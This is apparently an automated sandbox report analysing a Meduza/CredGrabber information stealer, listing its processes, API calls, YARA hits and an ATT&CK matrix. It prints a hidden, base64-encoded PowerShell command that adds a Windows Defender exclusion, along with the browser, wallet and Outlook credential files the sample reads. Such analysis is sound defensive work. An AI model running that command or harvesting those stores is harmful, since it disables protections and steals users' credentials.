Source: wbfTHB1mDB.exe, 00000008.00000003.2574834908.0000018C89D09000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: wbfTHB1mDB.exe, 00000008.00000003.2574834908.0000018C89D09000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: wbfTHB1mDB.exe, 00000008.00000003.2574834908.0000018C89D09000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: wbfTHB1mDB.exe, 00000008.00000003.2574834908.0000018C89D09000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: wbfTHB1mDB.exe, 00000008.00000003.2574834908.0000018C89D09000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: wbfTHB1mDB.exe, 00000008.00000003.2574834908.0000018C89D09000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: wbfTHB1mDB.exe, 00000008.00000003.2574834908.0000018C89D09000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552

Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	API call chain: ExitProcess graph end node			graph_8-77913
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	API call chain: ExitProcess graph end node			graph_8-77908

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe

Code function: 8_2_0000018C89A943F0 RtlAcquirePebLock,NtAllocateVirtualMemory,lstrcpyW,lstrcatW,NtAllocateVirtualMemory,lstrcpyW,RtlInitUnicodeString,RtlInitUnicodeString,LdrEnumerateLoadedModules,RtlReleasePebLock,CoInitializeEx,lstrcpyW,lstrcatW,CoGetObject,lstrcpyW,lstrcatW,CoGetObject,CoUninitialize,

8_2_0000018C89A943F0

Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe

Code function: 8_2_0000018C89A9F920 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

8_2_0000018C89A9F920

Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe

Code function: 8_2_0000018C89ACBB14 GetLastError,IsDebuggerPresent,OutputDebugStringW,

8_2_0000018C89ACBB14

Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe

Code function: 8_2_0000018C89A4B820 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,

8_2_0000018C89A4B820

Source: C:\Users\user\Desktop\9RM52QaURq.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89A9F920 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_0000018C89A9F920
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89AE22D8 SetUnhandledExceptionFilter,	8_2_0000018C89AE22D8
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_00007FF6A706D180 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_00007FF6A706D180
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_00007FF6A70600B0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_00007FF6A70600B0

Source: C:\Users\user\Desktop\9RM52QaURq.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Encrypted powershell cmdline option found

Source: C:\Users\user\Desktop\9RM52QaURq.exe	Process created: Base64 decoded Add-MpPreference -ExclusionPath 'C:\Users\engineer\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe'
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Process created: Base64 decoded Add-MpPreference -ExclusionPath 'C:\Users\engineer\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe'			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe

Code function: 8_2_0000018C89A851E0 ShellExecuteW,

8_2_0000018C89A851E0

Source: C:\Users\user\Desktop\9RM52QaURq.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVQBzAGUAcgBzAFwAZQBuAGcAaQBuAGUAZQByAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXABVAGEAWgBFAHEAbgBHADUAbgBPAFwAdwBiAGYAVABIAEIAMQBtAEQAQgAuAGUAeABlACcA			Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Process created: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe "C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe"			Jump to behavior

Source: C:\Users\user\Desktop\9RM52QaURq.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -noprofile -windowstyle hidden -encodedcommand qqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaccaqwa6afwavqbzaguacgbzafwazqbuagcaaqbuaguazqbyafwaqqbwahaarabhahqayqbcaewabwbjageababcafqazqbtahaaxabvageawgbfaheabgbhaduabgbpafwadwbiagyavabiaeiamqbtaeqaqgauaguaeablacca
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -noprofile -windowstyle hidden -encodedcommand qqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaccaqwa6afwavqbzaguacgbzafwazqbuagcaaqbuaguazqbyafwaqqbwahaarabhahqayqbcaewabwbjageababcafqazqbtahaaxabvageawgbfaheabgbhaduabgbpafwadwbiagyavabiaeiamqbtaeqaqgauaguaeablacca			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	8_2_0000018C89AB795C
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: EnumSystemLocalesW,	8_2_0000018C89AABC68
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,	8_2_0000018C89AB6F14
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: GetLocaleInfoW,	8_2_0000018C89AAC1A8
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: EnumSystemLocalesW,	8_2_0000018C89AB7340
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: EnumSystemLocalesW,	8_2_0000018C89AB7270
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: GetLocaleInfoEx,FormatMessageA,	8_2_0000018C89AC9480
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	8_2_0000018C89AB7778

Source: C:\Users\user\Desktop\9RM52QaURq.exe	Queries volume information: C:\Users\user\Desktop\9RM52QaURq.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe

Key value queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\TimeZoneInformation TimeZoneKeyName

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe

Code function: 8_2_0000018C89ABDC18 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

8_2_0000018C89ABDC18

Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe

Code function: 8_2_0000018C89A90110 GetUserNameW,

8_2_0000018C89A90110

Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe

Code function: 8_2_0000018C89AB114C _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,

8_2_0000018C89AB114C

Source: C:\Users\user\Desktop\9RM52QaURq.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected CredGrabber

Source: Yara match

File source: Process Memory Space: wbfTHB1mDB.exe PID: 4616, type: MEMORYSTR

Yara detected Meduza Stealer

Source: Yara match	File source: 8.2.wbfTHB1mDB.exe.18c89a10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.wbfTHB1mDB.exe.18c89a10000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.2650409439.0000018C89C20000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wbfTHB1mDB.exe PID: 4616, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: wbfTHB1mDB.exe, 00000008.00000003.2586557573.0000018C8813E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Electrum-LTC\config)
Source: wbfTHB1mDB.exe, 00000008.00000003.2586557573.0000018C8813E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\ElectronCash\wallets!
Source: wbfTHB1mDB.exe, 00000008.00000003.2573211700.0000018C8813E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Ny1aaXAgMjMuMDEgKHg2NCkgWzIzLjAxXQpNb3ppbGxhIEZpcmVmb3ggKHg2NCBlbi1VUykgWzExOC4wLjFdCk1vemlsbGEgTWFpbnRlbmFuY2UgU2VydmljZSBbMTE4LjAuMV0KTWljcm9zb2Z0IE9mZmljZSBQcm9mZXNzaW9uYWwgUGx1cyAyMDE5IC0gZW4tdXMgWzE2LjAuMTY4MjcuMjAxMzBdCk1pY3Jvc29mdCBWaXN1YWwgQysrIDIwMjIgWDY0IEFkZGl0aW9uYWwgUnVudGltZSAtIDE0LjM2LjMyNTMyIFsxNC4zNi4zMjUzMl0KT2ZmaWNlIDE2IENsaWNrLXRvLVJ1biBMaWNlbnNpbmcgQ29tcG9uZW50IFsxNi4wLjE2ODI3LjIwMTMwXQpPZmZpY2UgMTYgQ2xpY2stdG8tUnVuIEV4dGVuc2liaWxpdHkgQ29tcG9uZW50IDY0LWJpdCBSZWdpc3RyYXRpb24gWzE2LjAuMTY4MjcuMjAwNTZdCkFkb2JlIEFjcm9iYXQgKDY0LWJpdCkgWzIzLjAwNi4yMDMyMF0KTWljcm9zb2Z0IFZpc3VhbCBDKysgMjAyMiBYNjQgTWluaW11bSBSdW50aW1lIC0gMTQuMzYuMzI1MzIgWzE0LjM2LjMyNTMyXQpHb29nbGUgQ2hyb21lIFsxMTcuMC41OTM4LjEzNF0KTWljcm9zb2Z0IEVkZ2UgWzExNy4wLjIwNDUuNTVdCk1pY3Jvc29mdCBFZGdlIFVwZGF0ZSBbMS4zLjE3Ny4xMV0KTWljcm9zb2Z0IEVkZ2UgV2ViVmlldzIgUnVudGltZSBbMTE3LjAuMjA0NS40N10KSmF2YSBBdXRvIFVwZGF0ZXIgWzIuOC4zODEuOV0KSmF2YSA4IFVwZGF0ZSAzODEgWzguMC4zODEwLjldCk1pY3Jvc29mdCBWaXN1YWwgQysrIDIwMTUtMjAyMiBSZWRpc3RyaWJ1dGFibGUgKHg2NCkgLSAxNC4zNi4zMjUzMiBbMTQuMzYuMzI1MzIuMF0KT2ZmaWNlIDE2IENsaWNrLXRvLVJ1biBFeHRlbnNpYmlsaXR5IENvbXBvbmVudCBbMTYuMC4xNjgyNy4yMDEzMF0K
Source: wbfTHB1mDB.exe, 00000008.00000003.2586557573.0000018C8813E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ethereum\keystore
Source: wbfTHB1mDB.exe, 00000008.00000003.2586557573.0000018C8813E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\IOCoindus\exodus.walletq
Source: wbfTHB1mDB.exe, 00000008.00000003.2586557573.0000018C8813E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Binance-LTC\walletsp
Source: wbfTHB1mDB.exe, 00000008.00000003.2586557573.0000018C8813E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ethereum\keystore
Source: wbfTHB1mDB.exe, 00000008.00000003.2586557573.0000018C8813E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets!
Source: powershell.exe, 00000003.00000002.2418547237.0000000005C59000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: # AutoUnlockKeyStored. Win32_EncryptableVolume::IsAutoUnlockKeyStored

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\MANIFEST-000001	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\CURRENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOCK	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG.old	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: Yara match

File source: Process Memory Space: wbfTHB1mDB.exe PID: 4616, type: MEMORYSTR

Remote Access Functionality

Yara detected CredGrabber

Source: Yara match

File source: Process Memory Space: wbfTHB1mDB.exe PID: 4616, type: MEMORYSTR

Yara detected Meduza Stealer

Source: Yara match	File source: 8.2.wbfTHB1mDB.exe.18c89a10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.wbfTHB1mDB.exe.18c89a10000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.2650409439.0000018C89C20000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wbfTHB1mDB.exe PID: 4616, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	12 System Time Discovery	Remote Services	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
